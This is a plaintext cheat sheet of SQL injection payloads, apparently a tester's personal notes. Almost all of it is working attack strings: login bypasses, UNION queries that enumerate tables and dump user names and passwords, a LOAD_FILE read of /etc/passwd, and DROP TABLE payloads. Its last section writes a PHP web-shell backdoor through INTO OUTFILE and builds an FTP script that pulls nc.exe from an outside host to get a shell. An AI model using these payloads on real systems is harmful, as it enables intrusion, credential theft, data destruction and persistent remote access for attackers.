44 lines
1.6 KiB
Plaintext
44 lines
1.6 KiB
Plaintext
|
||
SQLi notes
|
||
==========
|
||
|
||
Login bypass
|
||
any' or 1=1 limit 1 ;#
|
||
' OR '1' = '1 / ' OR '1' = '1
|
||
;# ;-- #
|
||
|
||
|
||
?id=737 order by 6 --> Testing max columns
|
||
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
|
||
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
|
||
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
|
||
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
|
||
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
|
||
|
||
|
||
More examples
|
||
|
||
x%') #
|
||
x%') or 1=1 #
|
||
x%') order by 4 #
|
||
x%') union select all 4 #
|
||
x%') union select all 1,2,3@@version #
|
||
x%') and 1=1 #
|
||
|
||
x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) #
|
||
x%') and drop table if exists customers #
|
||
x%') and create database test #
|
||
x%') ; DROP ALL TABLES; #
|
||
|
||
@@hostname
|
||
|
||
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
|
||
|
||
|
||
Adding backdor.php
|
||
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
|
||
|
||
Getting a shell with php execute
|
||
192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'
|
||
|